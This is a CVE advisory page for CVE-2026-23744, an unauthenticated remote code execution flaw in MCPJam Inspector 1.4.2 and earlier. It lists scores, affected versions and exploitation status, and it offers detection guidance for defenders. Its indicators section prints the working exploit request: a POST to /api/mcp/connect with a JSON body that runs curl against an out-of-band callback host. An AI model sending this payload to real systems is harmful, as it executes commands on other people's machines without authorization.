cbcvebase.
CVE-2026-23744
published 2026-01-16

CVE-2026-23744: MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE)…

PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
38.37%
98.4th percentile
MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch.

Affected

3 ranges
VendorProductVersion rangeFixed in
mcpjaminspector< 1.4.31.4.3
mcpjaminspector<= 1.4.2
mcpjaminspector>= 0 < 1.4.31.4.3

Detection & IOCsextracted from sources · hover to see the quote

url/api/mcp/connect
commandPOST /api/mcp/connect HTTP/1.1
other{"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"}
  • Detect exploitation attempts by monitoring for POST requests to /api/mcp/connect with a JSON body containing 'command' and 'args' fields, which are used to trigger arbitrary OS command execution.
  • A successful exploitation attempt returns HTTP 500 with a JSON body containing both 'Connection failed for server' and 'MCP error' strings.
  • Monitor for out-of-band DNS/HTTP callbacks (OAST) triggered from the MCPJam Inspector process, as the PoC payload uses curl to beacon out to an attacker-controlled host.
  • MCPJam Inspector listens on 0.0.0.0 by default, making it reachable from any network interface. Alert on unexpected inbound connections to the MCPJam Inspector port from non-loopback addresses.
  • ·The vulnerability only requires unauthenticated network access (CWE-306: Missing Authentication). No credentials or prior access are needed, making any internet- or LAN-exposed MCPJam Inspector instance immediately exploitable.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.4CRITICAL
osv9.4CRITICAL
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.